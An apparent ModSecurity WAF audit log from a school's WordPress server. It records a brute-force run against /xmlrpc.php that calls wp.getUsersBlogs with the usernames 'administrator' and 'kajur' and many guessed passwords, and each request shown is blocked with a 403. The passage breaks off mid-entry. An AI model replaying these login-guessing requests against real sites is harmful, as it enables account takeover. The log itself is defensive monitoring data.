8181 --3637d37c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --3637d37c-C-- wp.getUsersBlogs administrator 1234%^&* --3637d37c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3637d37c-E-- --3637d37c-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. 
This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745078477680564 4420 (- - -) Stopwatch2: 1745078477680564 4420; combined=3349, p1=361, p2=2824, p3=0, p4=0, p5=97, sr=78, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3637d37c-Z-- --d273f953-A-- [19/Apr/2025:23:01:50 +0700] aAPI7kruoUXZj665VUFv3AAAAM8 103.236.140.4 58534 103.236.140.4 8181 --d273f953-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --d273f953-C-- wp.getUsersBlogs administrator 7777777 --d273f953-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d273f953-E-- --d273f953-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (40+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745078510029782 5304 (- - -) Stopwatch2: 1745078510029782 5304; combined=3933, p1=465, p2=3300, p3=0, p4=0, p5=99, sr=84, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d273f953-Z-- --df845300-A-- [19/Apr/2025:23:02:53 +0700] aAPJLQ6cTFSgLAHl7PpMOAAAABY 103.236.140.4 58874 103.236.140.4 8181 --df845300-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --df845300-C-- wp.getUsersBlogs administrator dubsmash --df845300-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --df845300-E-- --df845300-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (42+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745078573262428 5554 (- - -) Stopwatch2: 1745078573262428 5554; combined=4126, p1=510, p2=3435, p3=0, p4=0, p5=107, sr=92, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --df845300-Z-- --9cacd25d-A-- [19/Apr/2025:23:03:53 +0700] aAPJaQ6cTFSgLAHl7PpMXwAAAAc 103.236.140.4 59154 103.236.140.4 8181 --9cacd25d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --9cacd25d-C-- wp.getUsersBlogs administrator Testing1 --9cacd25d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9cacd25d-E-- --9cacd25d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (17+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745078633343494 5190 (- - -) Stopwatch2: 1745078633343494 5190; combined=3663, p1=432, p2=3047, p3=0, p4=0, p5=106, sr=87, sw=78, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9cacd25d-Z-- --5070705d-A-- [19/Apr/2025:23:04:58 +0700] aAPJquvDiFC_ir7MDwZQpgAAAEc 103.236.140.4 59436 103.236.140.4 8181 --5070705d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --5070705d-C-- wp.getUsersBlogs administrator bubbles --5070705d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5070705d-E-- --5070705d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (14+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745078698339224 5516 (- - -) Stopwatch2: 1745078698339224 5516; combined=3925, p1=445, p2=3228, p3=0, p4=0, p5=141, sr=85, sw=111, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5070705d-Z-- --f6de3f27-A-- [19/Apr/2025:23:06:00 +0700] aAPJ6HNa4dA2HllpK_PluwAAAJU 103.236.140.4 59758 103.236.140.4 8181 --f6de3f27-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --f6de3f27-C-- wp.getUsersBlogs administrator melissa --f6de3f27-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f6de3f27-E-- --f6de3f27-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (29+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745078760928372 5084 (- - -) Stopwatch2: 1745078760928372 5084; combined=3694, p1=429, p2=3088, p3=0, p4=0, p5=103, sr=80, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f6de3f27-Z-- --f6334c40-A-- [19/Apr/2025:23:07:06 +0700] aAPKKg6cTFSgLAHl7PpMzQAAABc 103.236.140.4 60086 103.236.140.4 8181 --f6334c40-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 230 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --f6334c40-C-- wp.getUsersBlogs administrator Bangbang123 --f6334c40-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f6334c40-E-- --f6334c40-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (30+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745078826821355 5461 (- - -) Stopwatch2: 1745078826821355 5461; combined=3842, p1=462, p2=3205, p3=0, p4=0, p5=103, sr=87, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f6334c40-Z-- --f7438923-A-- [19/Apr/2025:23:08:06 +0700] aAPKZg6cTFSgLAHl7PpM5QAAAAY 103.236.140.4 60394 103.236.140.4 8181 --f7438923-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 215 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --f7438923-C-- wp.getUsersBlogs kajur pass --f7438923-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f7438923-E-- --f7438923-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (27+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745078886659019 5293 (- - -) Stopwatch2: 1745078886659019 5293; combined=3891, p1=495, p2=3194, p3=0, p4=0, p5=116, sr=129, sw=86, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f7438923-Z-- --f3abdc43-A-- [19/Apr/2025:23:09:10 +0700] aAPKpg6cTFSgLAHl7PpM8QAAABY 103.236.140.4 60730 103.236.140.4 8181 --f3abdc43-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --f3abdc43-C-- wp.getUsersBlogs kajur r007p455w0rd --f3abdc43-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f3abdc43-E-- --f3abdc43-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (27+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745078950649812 4761 (- - -) Stopwatch2: 1745078950649812 4761; combined=3707, p1=456, p2=3056, p3=0, p4=0, p5=112, sr=84, sw=83, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f3abdc43-Z-- --54f23740-A-- [19/Apr/2025:23:10:10 +0700] aAPK4nNa4dA2HllpK_PmEwAAAIY 103.236.140.4 32774 103.236.140.4 8181 --54f23740-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --54f23740-C-- wp.getUsersBlogs kajur admin123!@# --54f23740-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --54f23740-E-- --54f23740-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (22+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745079010046387 5392 (- - -) Stopwatch2: 1745079010046387 5392; combined=3778, p1=438, p2=3171, p3=0, p4=0, p5=99, sr=85, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --54f23740-Z-- --cd5a5515-A-- [19/Apr/2025:23:11:10 +0700] aAPLHg6cTFSgLAHl7PpNGgAAABc 103.236.140.4 33078 103.236.140.4 8181 --cd5a5515-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --cd5a5515-C-- wp.getUsersBlogs kajur kajur2009 --cd5a5515-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cd5a5515-E-- --cd5a5515-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (33+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745079070582046 6071 (- - -) Stopwatch2: 1745079070582046 6071; combined=4264, p1=538, p2=3555, p3=0, p4=0, p5=101, sr=91, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cd5a5515-Z-- --6bff9f3e-A-- [19/Apr/2025:23:12:10 +0700] aAPLWg6cTFSgLAHl7PpNNAAAAAw 103.236.140.4 33382 103.236.140.4 8181 --6bff9f3e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --6bff9f3e-C-- wp.getUsersBlogs kajur p@ssw0rd --6bff9f3e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6bff9f3e-E-- --6bff9f3e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (31+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745079130189595 4331 (- - -) Stopwatch2: 1745079130189595 4331; combined=3274, p1=365, p2=2737, p3=0, p4=0, p5=100, sr=80, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6bff9f3e-Z-- --9ad7e62c-A-- [19/Apr/2025:23:13:10 +0700] aAPLlg6cTFSgLAHl7PpNUQAAAAA 103.236.140.4 33700 103.236.140.4 8181 --9ad7e62c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 217 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --9ad7e62c-C-- wp.getUsersBlogs kajur 112233 --9ad7e62c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9ad7e62c-E-- --9ad7e62c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (37+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745079190872959 5421 (- - -) Stopwatch2: 1745079190872959 5421; combined=3899, p1=477, p2=3188, p3=0, p4=0, p5=135, sr=112, sw=99, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9ad7e62c-Z-- --c6180255-A-- [19/Apr/2025:23:14:11 +0700] aAPL00ruoUXZj665VUFxJQAAANY 103.236.140.4 34012 103.236.140.4 8181 --c6180255-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --c6180255-C-- wp.getUsersBlogs kajur du7p72w5 --c6180255-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c6180255-E-- --c6180255-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (37+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745079251310933 4745 (- - -) Stopwatch2: 1745079251310933 4745; combined=3545, p1=424, p2=2956, p3=0, p4=0, p5=97, sr=76, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c6180255-Z-- --54fde55f-A-- [19/Apr/2025:23:15:13 +0700] aAPMEUruoUXZj665VUFxPgAAAMA 103.236.140.4 34304 103.236.140.4 8181 --54fde55f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --54fde55f-C-- wp.getUsersBlogs kajur kajur@1999 --54fde55f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --54fde55f-E-- --54fde55f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (24+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745079313577325 5382 (- - -) Stopwatch2: 1745079313577325 5382; combined=3789, p1=447, p2=3135, p3=0, p4=0, p5=132, sr=87, sw=75, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --54fde55f-Z-- --2ba16b33-A-- [19/Apr/2025:23:16:29 +0700] aAPMXXNa4dA2HllpK_PmsQAAAIs 103.236.140.4 34668 103.236.140.4 8181 --2ba16b33-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --2ba16b33-C-- wp.getUsersBlogs kajur Marketing2015 --2ba16b33-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2ba16b33-E-- --2ba16b33-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
